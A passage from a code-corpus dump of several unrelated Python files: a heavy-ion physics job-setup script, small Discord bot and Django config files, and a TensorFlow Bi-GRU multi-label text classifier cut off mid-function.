'UrQMD_events', '%s.dat' % filename)
bashCommand = "ln -s %s %s" % (
path.abspath(events_list[iev]), folder_path)
subprocess.Popen(bashCommand, stdout = subprocess.PIPE, shell=True)
mixed_id = random.randint(0, len(events_list)-1)
filename_mixed = events_list[mixed_id].split('/')[-1].split('.')[0]
mixed_event_id = filename_mixed.split('_')[-1]
        while (mixed_event_id == event_id):  # avoid pairing an event with itself
mixed_id = random.randint(0, len(events_list)-1)
filename_mixed = events_list[mixed_id].split('/')[-1].split('.')[0]
mixed_event_id = filename_mixed.split('_')[-1]
folder_path = path.join(
working_folder, 'event_%d' % folder_id,
'UrQMD_events', 'mixed_event_%s.dat' % event_id)
bashCommand = "ln -s %s %s" % (
path.abspath(events_list[mixed_id]), folder_path)
subprocess.Popen(bashCommand, stdout = subprocess.PIPE, shell=True)
def copy_JAM_events(number_of_cores, input_folder, working_folder):
events_list = glob('%s/particle_list_*.dat' % input_folder)
for iev in range(len(events_list)):
folder_id = iev % number_of_cores
filename = events_list[iev].split('/')[-1].split('.')[0]
event_id = filename.split('_')[-1]
folder_path = path.join(working_folder, 'event_%d' % folder_id,
'JAM_events', '%s.dat' % filename)
bashCommand = "ln -s %s %s" % (
path.abspath(events_list[iev]), folder_path)
subprocess.Popen(bashCommand, stdout = subprocess.PIPE, shell=True)
mixed_id = random.randint(0, len(events_list)-1)
filename_mixed = events_list[mixed_id].split('/')[-1].split('.')[0]
mixed_event_id = filename_mixed.split('_')[-1]
        while (mixed_event_id == event_id):  # avoid pairing an event with itself
mixed_id = random.randint(0, len(events_list)-1)
filename_mixed = events_list[mixed_id].split('/')[-1].split('.')[0]
mixed_event_id = filename_mixed.split('_')[-1]
folder_path = path.join(working_folder, 'event_%d' % folder_id,
'JAM_events', 'mixed_event_%s.dat' % event_id)
bashCommand = "ln -s %s %s" % (path.abspath(events_list[mixed_id]),
folder_path)
subprocess.Popen(bashCommand, stdout = subprocess.PIPE, shell=True)
def generate_event_folder_UrQMD(cluster_name, working_folder, event_id, mode):
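    """Create one per-core event folder and populate it with the job
    script and analysis code selected by `mode` (see
    print_mode_cheat_sheet for the mode meanings)."""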
event_folder = path.join(working_folder, 'event_%d' % event_id)
mkdir(event_folder)
if mode == 2:
# calculate HBT correlation with OSCAR outputs
mkdir(path.join(event_folder, 'OSCAR_events'))
generate_script_HBT_with_OSCAR(cluster_name, event_folder)
elif mode == 3:
# calculate HBT correlation with UrQMD outputs
mkdir(path.join(event_folder, 'UrQMD_events'))
generate_script_HBT(cluster_name, event_folder)
elif mode == 4:
# calculate HBT correlation with UrQMD outputs
mkdir(path.join(event_folder, 'UrQMD_events'))
generate_script_spectra_and_vn(cluster_name, event_folder)
elif mode == 8:
# collect event-by-event particle distribution
mkdir(path.join(event_folder, 'UrQMD_events'))
generate_script_particle_yield_distribution(cluster_name, event_folder)
elif mode == 9:
# calculate event-by-event particle distribution with OSCAR outputs
mkdir(path.join(event_folder, 'OSCAR_events'))
generate_script_particle_yield_distribution_with_OSCAR(cluster_name,
event_folder)
elif mode == 10:
# calculate balance function correlation with UrQMD outputs
mkdir(path.join(event_folder, 'UrQMD_events'))
generate_script_balance_function(cluster_name, event_folder)
shutil.copytree('codes/hadronic_afterburner_toolkit',
path.join(path.abspath(event_folder),
'hadronic_afterburner_toolkit'))
subprocess.call("ln -s {0:s} {1:s}".format(
path.abspath(path.join('codes', 'hadronic_afterburner_toolkit_code',
'hadronic_afterburner_tools.e')),
path.join(path.abspath(event_folder), "hadronic_afterburner_toolkit",
"hadronic_afterburner_tools.e")), shell=True)
subprocess.call("ln -s {0:s} {1:s}".format(
path.abspath('codes/hadronic_afterburner_toolkit_code/EOS'),
path.join(path.abspath(event_folder),
"hadronic_afterburner_toolkit/EOS")), shell=True)
def generate_event_folder_JAM(cluster_name, working_folder, event_id, mode):
event_folder = path.join(working_folder, 'event_%d' % event_id)
mkdir(event_folder)
if mode == 5:
# run JAM with OSCAR files
mkdir(path.join(event_folder, 'OSCAR_events'))
generate_script_JAM(cluster_name, event_folder)
shutil.copytree('codes/JAM',
path.join(path.abspath(event_folder), 'JAM'))
elif mode == 6:
# collect particle spectra and vn with JAM outputs
mkdir(path.join(event_folder, 'JAM_events'))
generate_script_spectra_and_vn_with_JAM(cluster_name, event_folder)
shutil.copytree('codes/hadronic_afterburner_toolkit',
path.join(path.abspath(event_folder),
'hadronic_afterburner_toolkit'))
elif mode == 7:
# calculate HBT correlation with JAM outputs
mkdir(path.join(event_folder, 'JAM_events'))
generate_script_HBT_with_JAM(cluster_name, event_folder)
shutil.copytree('codes/hadronic_afterburner_toolkit',
path.join(path.abspath(event_folder),
'hadronic_afterburner_toolkit'))
def generate_event_folder(cluster_name, working_folder, event_id):
event_folder = path.join(working_folder, 'event_%d' % event_id)
mkdir(event_folder)
mkdir(path.join(event_folder, 'OSCAR_events'))
generate_script(cluster_name, event_folder)
shutil.copytree('codes/osc2u',
path.join(path.abspath(event_folder), 'osc2u'))
shutil.copytree('codes/urqmd',
path.join(path.abspath(event_folder), 'urqmd'))
subprocess.call("ln -s {0:s} {1:s}".format(
path.abspath('codes/urqmd_code/urqmd/urqmd.e'),
path.join(path.abspath(event_folder), "urqmd/urqmd.e")), shell=True)
def copy_OSCAR_events(number_of_cores, input_folder, working_folder):
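    """Link OSCAR event files round-robin into the per-core working
    folders, pairing each event with a random mixed-event partner."""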
events_list = glob('%s/*.dat' % input_folder)
for iev in range(len(events_list)):
folder_id = iev % number_of_cores
filename = events_list[iev].split('/')[-1].split('.')[0]
event_id = filename.split('_')[-1]
folder_path = path.join(
working_folder, 'event_%d' % folder_id,
'OSCAR_events', events_list[iev].split('/')[-1])
bashCommand = "ln -s %s %s" % (
path.abspath(events_list[iev]), folder_path)
subprocess.Popen(bashCommand, stdout = subprocess.PIPE, shell=True)
mixed_id = random.randint(0, len(events_list)-1)
filename_mixed = events_list[mixed_id].split('/')[-1].split('.')[0]
mixed_event_id = filename_mixed.split('_')[-1]
        while (mixed_event_id == event_id):  # avoid pairing an event with itself
mixed_id = random.randint(0, len(events_list)-1)
filename_mixed = events_list[mixed_id].split('/')[-1].split('.')[0]
mixed_event_id = filename_mixed.split('_')[-1]
folder_path = path.join(
working_folder, 'event_%d' % folder_id,
'OSCAR_events', 'mixed_event_%s.dat' % event_id)
bashCommand = "ln -s %s %s" % (
path.abspath(events_list[mixed_id]), folder_path)
subprocess.Popen(bashCommand, stdout = subprocess.PIPE, shell=True)
def generate_event_folder_iSS(cluster_name, working_folder, event_id):
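    """Create one per-core event folder with the full iSS + osc2u +
    UrQMD + afterburner tool chain (copies the code folders and links
    the large executables and tables)."""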
event_folder = path.join(working_folder, 'event_%d' % event_id)
mkdir(event_folder)
mkdir(path.join(event_folder, 'hydro_events'))
generate_script_iSS(cluster_name, event_folder)
shutil.copytree('codes/iSS',
path.join(path.abspath(event_folder), 'iSS'))
subprocess.call("ln -s {0:s} {1:s}".format(
path.abspath('codes/iSS_code/iSS_tables'),
path.join(path.abspath(event_folder), "iSS/iSS_tables")), shell=True)
subprocess.call("ln -s {0:s} {1:s}".format(
path.abspath('codes/iSS_code/iSS.e'),
path.join(path.abspath(event_folder), "iSS/iSS.e")), shell=True)
shutil.copytree('codes/osc2u',
path.join(path.abspath(event_folder), 'osc2u'))
shutil.copytree('codes/urqmd',
path.join(path.abspath(event_folder), 'urqmd'))
subprocess.call("ln -s {0:s} {1:s}".format(
path.abspath('codes/urqmd_code/urqmd/urqmd.e'),
path.join(path.abspath(event_folder), "urqmd/urqmd.e")), shell=True)
shutil.copytree('codes/hadronic_afterburner_toolkit',
path.join(path.abspath(event_folder),
'hadronic_afterburner_toolkit'))
subprocess.call("ln -s {0:s} {1:s}".format(
path.abspath('codes/hadronic_afterburner_toolkit_code/EOS'),
path.join(path.abspath(event_folder),
"hadronic_afterburner_toolkit/EOS")), shell=True)
def generate_event_folder_iS(cluster_name, working_folder, event_id):
event_folder = path.join(working_folder, 'event_%d' % event_id)
mkdir(event_folder)
mkdir(path.join(event_folder, 'hydro_events'))
generate_script_iS(cluster_name, event_folder)
shutil.copytree('codes/iS',
path.join(path.abspath(event_folder), 'iS'))
def copy_hydro_events(number_of_cores, input_folder, working_folder):
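    """Link hydro surface files round-robin into the per-core working
    folders and copy the matching MUSIC input file alongside each."""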
events_list = glob('%s/surface*.dat' % input_folder)
for iev in range(len(events_list)):
event_id = events_list[iev].split('/')[-1].split('_')[-1].split('.')[0]
folder_id = iev % number_of_cores
working_path = path.join(working_folder, 'event_%d' % folder_id,
'hydro_events')
folder_path = path.join(working_path, events_list[iev].split('/')[-1])
bashCommand = "ln -s %s %s" % (
path.abspath(events_list[iev]), folder_path)
subprocess.Popen(bashCommand, stdout = subprocess.PIPE, shell=True)
shutil.copy(path.join(input_folder,
'music_input_event_%s' % event_id),
working_path)
def copy_job_scripts(working_folder):
shutil.copy("job_MPI_wrapper.py", working_folder)
shutil.copy("submit_MPI_job_for_all.pbs", working_folder)
shutil.copy("run_job.sh", working_folder)
def print_mode_cheat_sheet():
    print("Here is a cheat sheet for the mode option:")
    print("mode -1: run iS + resonance decay")
    print("mode 0: run iSS + osc2u + UrQMD from hydro hypersurface")
    print("mode 1: run UrQMD with OSCAR events")
    print("mode 2: calculate HBT correlation with OSCAR events")
    print("mode 3: calculate HBT correlation with UrQMD events")
    print("mode 4: collect spectra and flow observables from UrQMD events")
    print("mode 5: run JAM with OSCAR events")
    print("mode 6: collect spectra and vn with JAM events")
    print("mode 7: calculate HBT correlation with JAM events")
    print("mode 8: collect particle yield distribution with UrQMD events")
    print("mode 9: collect particle yield distribution with OSCAR events")
    print("mode 10: calculate balance function correlation with UrQMD events")
if __name__ == "__main__":
try:
from_folder = str(sys.argv[1])
folder_name = str(sys.argv[2])
cluster_name = str(sys.argv[3])
ncore = int(sys.argv[4])
mode = int(sys.argv[5])
    except (IndexError, ValueError):
print("Usage:")
print(" %s input_folder working_folder cluster_name num_of_cores mode"
% str(sys.argv[0]))
print("")
print_mode_cheat_sheet()
exit(0)
if mode == 0: # run iSS + osc2u + UrQMD from hydro hypersurface
for icore in range(ncore):
generate_event_folder_iSS(cluster_name, folder_name, icore)
copy_hydro_events(ncore, from_folder, folder_name)
copy_job_scripts(folder_name)
elif mode == -1: # run iS + resonance decay
for icore in range(ncore):
generate_event_folder_iS(cluster_name, folder_name, icore)
copy_hydro_events(ncore, from_folder, folder_name)
elif mode == 1: # run UrQMD with OSCAR events
for icore in range(ncore):
generate_event_folder(cluster_name, folder_name, icore)
copy_OSCAR_events(ncore, from_folder, folder_name)
elif mode == 2: # calculate HBT correlation with OSCAR events
for icore in range(ncore):
generate_event_folder_UrQMD(cluster_name, folder_name, icore, mode)
copy_OSCAR_events(ncore, from_folder, folder_name)
elif mode == 3: # calculate HBT correlation with UrQMD events
for icore in range(ncore):
generate_event_folder_UrQMD(cluster_name, folder_name, icore, mode)
copy_UrQMD_events(ncore, from_folder, folder_name)
copy_job_scripts(folder_name)
elif mode == 4: # collect spectra and flow observables from UrQMD events
for icore in range(ncore):
generate_event_folder_UrQMD(cluster_name, folder_name, icore, mode)
copy_UrQMD_events(ncore, from_folder, folder_name)
copy_job_scripts(folder_name)
elif mode == 5: # run JAM with OSCAR events
for icore in range(ncore):
generate_event_folder_JAM(cluster_name, folder_name, icore, mode)
copy_OSCAR_events(ncore, from_folder, folder_name)
elif mode == 6: # collect spectra and vn with JAM events
for icore in range(ncore):
generate_event_folder_JAM(cluster_name, folder_name, icore, mode)
copy_JAM_events(ncore, from_folder, folder_name)
elif mode == 7: # calculate HBT correlation with JAM events
for icore in range(ncore):
generate_event_folder_JAM(cluster_name, folder_name, icore, mode)
copy_JAM_events(ncore, from_folder, folder_name)
elif mode == 8: # collect particle yield distribution with UrQMD events
for icore in range(ncore):
generate_event_folder_UrQMD(cluster_name, folder_name, icore, mode)
copy_UrQMD_events(ncore, from_folder, folder_name)
elif mode == 9: # collect particle yield distribution with OSCAR events
for icore in range(ncore):
generate_event_folder_UrQMD(cluster_name, folder_name, icore, mode)
copy_OSCAR_events(ncore, from_folder, folder_name)
elif mode == 10: # calculate balance function correlation with UrQMD events
for icore in range(ncore):
generate_event_folder_UrQMD(cluster_name, folder_name, icore, mode)
copy_UrQMD_events(ncore, from_folder, folder_name)
copy_job_scripts(folder_name)
[record stats] avg_line_length 42.130221 | max_line_length 253 | alphanum_fraction 0.666297 | (remaining numeric quality-signal columns omitted)
[record] hexsha 8ba2e373bcb013631bced573d39f363772bcfa6a | size 233 | ext py | lang Python | path config/globals.py | repo pw963/WVS | head ab012f2f427d593ebf442f67d1b8be009db25fa0 | licenses ["MIT"] | star/issue/fork counts and dates: null
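# Extension (cog) module paths; the "cogs." prefixes suggest they are loaded by a discord.py-style bot at startup.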
extensions = [
"cogs.help",
"cogs.game_punishments.ban",
"cogs.game_punishments.kick",
"cogs.game_punishments.unban",
"cogs.game_punishments.warn",
"cogs.settings.setchannel",
"cogs.verification.verify"
]
[record stats] avg_line_length 23.3 | max_line_length 34 | alphanum_fraction 0.678112 | (remaining numeric quality-signal columns omitted)
[record] hexsha 8bcbe52d00899351636051088de27ac0604b7da6 | size 188 | ext py | lang Python | path app/core/admin.py | repo jingr1986/Paranuara-Challenge | head 4c1bb619a79df9a7405f8b7fd29911b011a0d590 | licenses ["MIT"] | star/issue/fork counts and dates: null
from django.contrib import admin
from .models import Company, People, Tag, Food
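# Register the core models so they are editable in the Django admin site.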
admin.site.register(Company)
admin.site.register(People)
admin.site.register(Tag)
admin.site.register(Food)
[record stats] avg_line_length 26.857143 | max_line_length 46 | alphanum_fraction 0.808511 | (remaining numeric quality-signal columns omitted)
[record] hexsha 8bd0c2139fe78dc1b75f8c575d63e8b12416b8f0 | size 29 | ext py | lang Python | path mobula/operators/Layer.py | repo wkcn/mobula | head 4eec938d6477776f5f2d68bcf41de83fb8da5195 | licenses ["MIT"] | stars 47 (2017-07-15T02:13:18.000Z to 2022-01-01T09:37:59.000Z) | issues 3 (2018-06-22T13:55:12.000Z to 2020-01-29T01:41:13.000Z) | forks 8 (2017-09-03T12:42:54.000Z to 2020-09-27T03:38:59.000Z)
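# Star-import that re-exports the layers.Layer API at the operators level (inferred from the module path).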
from ..layers.Layer import *
[record stats] avg_line_length 14.5 | max_line_length 28 | alphanum_fraction 0.724138 | (remaining numeric quality-signal columns omitted)
[record] hexsha 479227225dc0f0d08f09761988430170ea59f17a | size 92 | ext py | lang Python | path pytest/src/operations/AddOperation.py | repo ronaldfalcao/python-codes | head 70fec6836844c70c3678425cd84cf50fd6897d45 | licenses ["MIT"] | star/issue/fork counts and dates: null
class AddOperation:
def soma(self, number1, number2):
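        """Return the sum of number1 and number2 ("soma" is Portuguese for "sum")."""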
return number1 + number2
[record stats] avg_line_length 18.4 | max_line_length 37 | alphanum_fraction 0.673913 | (remaining numeric quality-signal columns omitted)
[record] hexsha 47f4d10565ede80ecf038a7a5188e1ade5f6d850 | size 56,819 | ext py | lang Python | path 1 Bi-GRU/BiGRU_model.py | repo acadTags/Automated-Social-Annotation | head a988f7b11998accb9357dc920b90760f537edfee | licenses ["MIT"] | stars 12 (2018-12-09T07:45:12.000Z to 2021-09-22T09:18:11.000Z) | issues: null | forks 4 (2020-03-19T19:11:20.000Z to 2021-11-27T11:26:19.000Z)
# -*- coding: utf-8 -*-
import tensorflow as tf
from tensorflow.contrib import rnn
import numpy as np
class BiGRU:
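    """Bi-directional GRU for (multi-)label document classification with
    optional label-similarity (L_sim) and label-subsumption (L_sub)
    regularisers computed on the sigmoid outputs."""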
def __init__(self,num_classes, learning_rate, batch_size, decay_steps, decay_rate,sequence_length,
vocab_size,embed_size,is_training,lambda_sim=0.00001,lambda_sub=0,dynamic_sem=False,dynamic_sem_l2=False,initializer=tf.random_normal_initializer(stddev=0.1),clip_gradients=5.0,multi_label_flag=True): #initializer=tf.random_normal_initializer(stddev=0.1)
"""init all hyperparameter here"""
# set hyperparamter
self.num_sentences = 1
self.num_classes = num_classes
self.batch_size = batch_size
self.sequence_length=sequence_length
self.vocab_size=vocab_size
self.embed_size=embed_size
self.hidden_size=embed_size
self.is_training=is_training
self.learning_rate = tf.Variable(learning_rate, trainable=False, name="learning_rate")
        self.learning_rate_decay_half_op = tf.assign(self.learning_rate, self.learning_rate * 0.5) # use assign to halve the learning_rate
self.initializer=initializer
self.multi_label_flag = multi_label_flag
self.clip_gradients=clip_gradients
self.lambda_sim=lambda_sim
self.lambda_sub=lambda_sub
self.dynamic_sem = dynamic_sem
self.dynamic_sem_l2 = dynamic_sem_l2
# add placeholder (X,label)
self.input_x = tf.placeholder(tf.int32, [None, self.sequence_length], name="input_x") # X
self.input_y = tf.placeholder(tf.int32,[None], name="input_y") # for single label # y [None,num_classes]
self.input_y_multilabel = tf.placeholder(tf.float32, [None, self.num_classes],name="input_y_multilabel") # y:[None,num_classes]. this is for multi-label classification only.
self.dropout_keep_prob=tf.placeholder(tf.float32,name="dropout_keep_prob")
#self.label_sim_matrix = tf.placeholder(tf.float32, [self.num_classes,self.num_classes],name="label_sim_mat")
#self.label_sub_matrix = tf.placeholder(tf.float32, [self.num_classes,self.num_classes],name="label_sub_mat")
self.label_sim_matrix_static = tf.placeholder(tf.float32, [self.num_classes,self.num_classes],name="label_sim_mat_const")
self.label_sub_matrix_static = tf.placeholder(tf.float32, [self.num_classes,self.num_classes],name="label_sub_mat_const")
if self.dynamic_sem == False:
self.label_sim_matrix = self.label_sim_matrix_static
self.label_sub_matrix = self.label_sub_matrix_static
print('self.dynamic_sem:',self.dynamic_sem)
self.global_step = tf.Variable(0, trainable=False, name="Global_Step")
self.epoch_step=tf.Variable(0,trainable=False,name="Epoch_Step")
self.epoch_increment=tf.assign(self.epoch_step,tf.add(self.epoch_step,tf.constant(1)))
self.decay_steps, self.decay_rate = decay_steps, decay_rate
self.instantiate_weights()
print('self.label_sim_matrix:',self.label_sim_matrix)
print('self.label_sub_matrix:',self.label_sub_matrix)
print('display trainable variables')
for v in tf.trainable_variables():
print(v)
self.logits = self.inference() #[None, self.label_size]. main computation graph is here.
if not is_training:
return
if multi_label_flag:
print("going to use multi label loss.")
if self.lambda_sim == 0:
if self.lambda_sub == 0:
                    # neither L_sim nor L_sub
self.loss_val = self.loss_multilabel() # without any semantic regularisers, no L_sim or L_sub
else:
# using L_sub only
#self.loss_val = self.loss_multilabel_onto_new_sub_per_batch(self.label_sub_matrix); # j,k per batch - used in the NAACL paper
self.loss_val = self.loss_multilabel_onto_new_sub_per_doc(self.label_sub_matrix,dynamic_sem_l2=self.dynamic_sem_l2); # j,k per document
else:
if self.lambda_sub == 0:
# using L_sim only
#pair_diff_squared on s_d
#self.loss_val = self.loss_multilabel_onto_new_sim_per_batch(self.label_sim_matrix) # j,k per batch - used in the NAACL paper
#self.loss_val = self.loss_multilabel_onto_new_sim_per_doc_tensor(self.label_sim_matrix) # j,k per document - tensor operations - requiring large GPU memory
#self.loss_val = self.loss_multilabel_onto_new_sim_per_doc_not_used(self.label_sim_matrix) # j,k per document - with for loop - requiring large GPU memory
self.loss_val = self.loss_multilabel_onto_new_sim_per_doc(self.label_sim_matrix,dynamic_sem_l2=self.dynamic_sem_l2) # j,k per document - with for loop
#pair_diff_abs on rounded s_d
#self.loss_val = self.loss_multilabel_onto_new_sim_pair_diff_abs(self.label_sim_matrix) # j,k per document - new sim pair_diff_abs
else:
# sim+sub
#self.loss_val = self.loss_multilabel_onto_new_simsub_per_batch(self.label_sim_matrix,self.label_sub_matrix) # j,k per batch - used in the NAACL paper
self.loss_val = self.loss_multilabel_onto_new_simsub_per_doc(self.label_sim_matrix,self.label_sub_matrix,dynamic_sem_l2=self.dynamic_sem_l2) # j,k per document
#self.loss_val = self.loss_multilabel_onto_new_simsub_pair_diff_abs(self.label_sim_matrix,self.label_sub_matrix) # j,k per document, l_sim pair_diff_abs
else:
print("going to use single label loss.")
self.loss_val = self.loss()
self.train_op = self.train()
# output evaluation results on training data
sig_output = tf.sigmoid(self.logits)
if not self.multi_label_flag:
self.predictions = tf.argmax(sig_output, axis=1, name="predictions") # shape:[None,]
correct_prediction = tf.equal(tf.cast(self.predictions, tf.int32),
self.input_y) # tf.argmax(self.logits, 1)-->[batch_size]
self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), name="Accuracy") # shape=()
self.precision = 0
self.recall = 0
#self.f_measure = 0
else:
            self.predictions = tf.round(sig_output) # round sigmoid outputs to {0,1}: predict 1 when sigmoid(logit) >= 0.5
#self.predictions = tf.cast(tf.greater(self.sig_logits,0.25),tf.float32)
temp = tf.cast(tf.equal(self.predictions,self.input_y_multilabel), tf.float32)
print('temp',temp)
tp = tf.reduce_sum(tf.multiply(temp,self.predictions), axis=1) # [128,1]
p = tf.reduce_sum(self.predictions, axis=1) + 1e-10 # [128,1]
t = tf.reduce_sum(self.input_y_multilabel, axis=1) # [128,1]
union = tf.reduce_sum(tf.cast(tf.greater(self.predictions + self.input_y_multilabel,0),tf.float32), axis=1) # [128,1]
self.accuracy = tf.reduce_mean(tf.div(tp,union))
self.precision = tf.reduce_mean(tf.div(tp,p))
self.recall = tf.reduce_mean(tf.div(tp,t))
self.training_loss = tf.summary.scalar("train_loss_per_batch",self.loss_val)
self.training_loss_per_epoch = tf.summary.scalar("train_loss_per_epoch",self.loss_val)
self.validation_loss = tf.summary.scalar("validation_loss_per_batch",self.loss_val)
self.validation_loss_per_epoch = tf.summary.scalar("validation_loss_per_epoch",self.loss_val)
self.writer = tf.summary.FileWriter("./logs")
def instantiate_weights(self):
"""define all weights here"""
with tf.name_scope("embedding"): # embedding matrix
self.Embedding = tf.get_variable("Embedding",shape=[self.vocab_size, self.embed_size],initializer=self.initializer) #[vocab_size,embed_size] tf.random_uniform([self.vocab_size, self.embed_size],-1.0,1.0)
self.W_projection = tf.get_variable("W_projection",shape=[self.hidden_size*2, self.num_classes],initializer=self.initializer) #[embed_size,label_size]
self.b_projection = tf.get_variable("b_projection",shape=[self.num_classes]) #[label_size]
if self.dynamic_sem == True:
            print('initialise dynamic sem loss weights')
if self.lambda_sim != 0:
self.label_sim_matrix = tf.get_variable("label_sim_mat", shape=[self.num_classes, self.num_classes], initializer=self.initializer)
#print('label_sim_matrix initialised as label_sim_matrix_static')
if self.lambda_sub == 0:
self.label_sub_matrix = self.label_sub_matrix_static # as static weights
else:
self.label_sub_matrix = tf.get_variable("label_sub_mat", shape=[self.num_classes, self.num_classes], initializer=self.initializer)
else:
self.label_sim_matrix = self.label_sim_matrix_static # as static weights
if self.lambda_sub == 0:
self.label_sub_matrix = self.label_sub_matrix_static # as static weights
else:
self.label_sub_matrix = tf.get_variable("label_sub_mat", shape=[self.num_classes, self.num_classes], initializer=self.initializer)
with tf.name_scope("gru_weights_word_level"):
self.W_z = tf.get_variable("W_z", shape=[self.embed_size, self.hidden_size], initializer=self.initializer)
self.U_z = tf.get_variable("U_z", shape=[self.embed_size, self.hidden_size], initializer=self.initializer)
self.b_z = tf.get_variable("b_z", shape=[self.hidden_size])
# GRU parameters:reset gate related
self.W_r = tf.get_variable("W_r", shape=[self.embed_size, self.hidden_size], initializer=self.initializer)
self.U_r = tf.get_variable("U_r", shape=[self.embed_size, self.hidden_size], initializer=self.initializer)
self.b_r = tf.get_variable("b_r", shape=[self.hidden_size])
self.W_h = tf.get_variable("W_h", shape=[self.embed_size, self.hidden_size], initializer=self.initializer)
self.U_h = tf.get_variable("U_h", shape=[self.embed_size, self.hidden_size], initializer=self.initializer)
self.b_h = tf.get_variable("b_h", shape=[self.hidden_size])
#this is the original lstm implementation in https://github.com/brightmart/text_classification/blob/master/a03_TextRNN/p8_TextRNN_model.py
def inference_lstm(self):
"""main computation graph here: 1. embeddding layer, 2.Bi-LSTM layer, 3.concat, 4.FC layer 5.softmax """
#1.get emebedding of words in the sentence
self.embedded_words = tf.nn.embedding_lookup(self.Embedding,self.input_x) #shape:[None,sentence_length,embed_size]
#2. Bi-lstm layer
# define lstm cess:get lstm cell output
lstm_fw_cell=rnn.BasicLSTMCell(self.hidden_size) #forward direction cell
lstm_bw_cell=rnn.BasicLSTMCell(self.hidden_size) #backward direction cell
if self.dropout_keep_prob is not None:
lstm_fw_cell=rnn.DropoutWrapper(lstm_fw_cell,output_keep_prob=self.dropout_keep_prob)
lstm_bw_cell=rnn.DropoutWrapper(lstm_bw_cell,output_keep_prob=self.dropout_keep_prob)
# bidirectional_dynamic_rnn: input: [batch_size, max_time, input_size]
# output: A tuple (outputs, output_states)
# where outputs: A tuple (output_fw, output_bw) containing the forward and the backward rnn output `Tensor`.
outputs,_=tf.nn.bidirectional_dynamic_rnn(lstm_fw_cell,lstm_bw_cell,self.embedded_words,dtype=tf.float32) #[batch_size,sequence_length,hidden_size] #creates a dynamic bidirectional recurrent neural network
print("outputs:===>",outputs) #outputs:(<tf.Tensor 'bidirectional_rnn/fw/fw/transpose:0' shape=(?, 5, 100) dtype=float32>, <tf.Tensor 'ReverseV2:0' shape=(?, 5, 100) dtype=float32>))
#3. concat output
output_rnn=tf.concat(outputs,axis=2) #[batch_size,sequence_length,hidden_size*2]
#self.output_rnn_last=tf.reduce_mean(output_rnn,axis=1) #[batch_size,hidden_size*2] # this is average pooling
self.output_rnn_last=output_rnn[:,-1,:] ##[batch_size,hidden_size*2] # this uses the last hidden state as the representation.
print("output_rnn_last:", self.output_rnn_last) # <tf.Tensor 'strided_slice:0' shape=(?, 200) dtype=float32>
#4. logits(use linear layer)
with tf.name_scope("output"): #inputs: A `Tensor` of shape `[batch_size, dim]`. The forward activations of the input network.
logits = tf.matmul(self.output_rnn_last, self.W_projection) + self.b_projection # [batch_size,num_classes]
return logits
# using gru instead of lstm
def inference(self):
self.embedded_words = tf.nn.embedding_lookup(self.Embedding,self.input_x)
embedded_words_reshaped = tf.reshape(self.embedded_words, shape=[-1, self.sequence_length,self.embed_size])
# 1.2 forward gru
hidden_state_forward_list = self.gru_forward_word_level(embedded_words_reshaped) # a list,length is sentence_length, each element is [batch_size*num_sentences,hidden_size]
# 1.3 backward gru
hidden_state_backward_list = self.gru_backward_word_level(embedded_words_reshaped) # a list,length is sentence_length, each element is [batch_size*num_sentences,hidden_size]
# 1.4 concat forward hidden state and backward hidden state. hidden_state: a list.len:sentence_length,element:[batch_size*num_sentences,hidden_size*2]
self.hidden_state = [tf.concat([h_forward, h_backward], axis=1) for h_forward, h_backward in
zip(hidden_state_forward_list, hidden_state_backward_list)] # hidden_state:list,len:sentence_length,element:[batch_size*num_sentences,hidden_size*2]
#self.hidden_state is a list.
print('self.hidden_state', len(self.hidden_state), self.hidden_state[0].get_shape())
self.output_rnn_last = self.hidden_state[-1] # using last hidden state
#self.output_rnn_last = self.hidden_state[0] # using first hidden state
print("output_rnn_last:", self.output_rnn_last) # <tf.Tensor 'strided_slice:0' shape=(?, 200) dtype=float32>
#4. logits(use linear layer)
with tf.name_scope("output"): #inputs: A `Tensor` of shape `[batch_size, dim]`. The forward activations of the input network.
logits = tf.matmul(self.output_rnn_last, self.W_projection) + self.b_projection # [batch_size,num_classes]
return logits
# loss for single-label classification
def loss(self, l2_lambda=0.0001): # 0.001
with tf.name_scope("loss"):
# input: `logits`:[batch_size, num_classes], and `labels`:[batch_size]
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
losses = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self.input_y,
logits=self.logits); # sigmoid_cross_entropy_with_logits.#losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input_y,logits=self.logits)
# print("1.sparse_softmax_cross_entropy_with_logits.losses:",losses) # shape=(?,)
loss = tf.reduce_mean(losses) # print("2.loss.loss:", loss) #shape=()
l2_losses = tf.add_n(
[tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda
loss = loss + l2_losses
return loss
# loss for multi-label classification (JMAN-s)
def loss_multilabel(self, l2_lambda=0.0001):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
losses = tf.nn.sigmoid_cross_entropy_with_logits(labels=self.input_y_multilabel,
logits=self.logits); # losses=tf.nn.softmax_cross_entropy_with_logits(labels=self.input__y,logits=self.logits)
# losses=-self.input_y_multilabel*tf.log(self.logits)-(1-self.input_y_multilabel)*tf.log(1-self.logits)
print("sigmoid_cross_entropy_with_logits.losses:", losses) # shape=(?, 1999).
losses = tf.reduce_sum(losses, axis=1) # shape=(?,). loss for all data in the batch
self.loss_ce = tf.reduce_mean(losses) # shape=(). average loss in the batch
            self.l2_losses = tf.add_n([tf.nn.l2_loss(v) for v in tf.trainable_variables() if 'bias' not in v.name]) * l2_lambda # l2 loss
self.sim_loss = tf.constant(0., dtype=tf.float32)
self.sub_loss = tf.constant(0., dtype=tf.float32)
loss = self.loss_ce + self.l2_losses
return loss
# L_sim new: j,k per doc, \sum_d \sum_{j,k \in y_d} Sim_jk|R(S_dj)-R(S_dk)|
def loss_multilabel_onto_new_sim_pair_diff_abs(self, label_sim_matrix, l2_lambda=0.0001):
with tf.name_scope("loss"):
# input: `logits` and `labels` must have the same shape `[batch_size, num_classes]`
# output: A 1-D `Tensor` of length `batch_size` of the same type as `logits` with the softmax cross entropy loss.
# input_y:shape=(?, 1999); logits:shape=(?, 1999)
# let `x = logits`, `z = labels`. The logistic loss is:z * -log(sigmoid(x)) + (1 - z) * -log(1 - sigmoid(x))
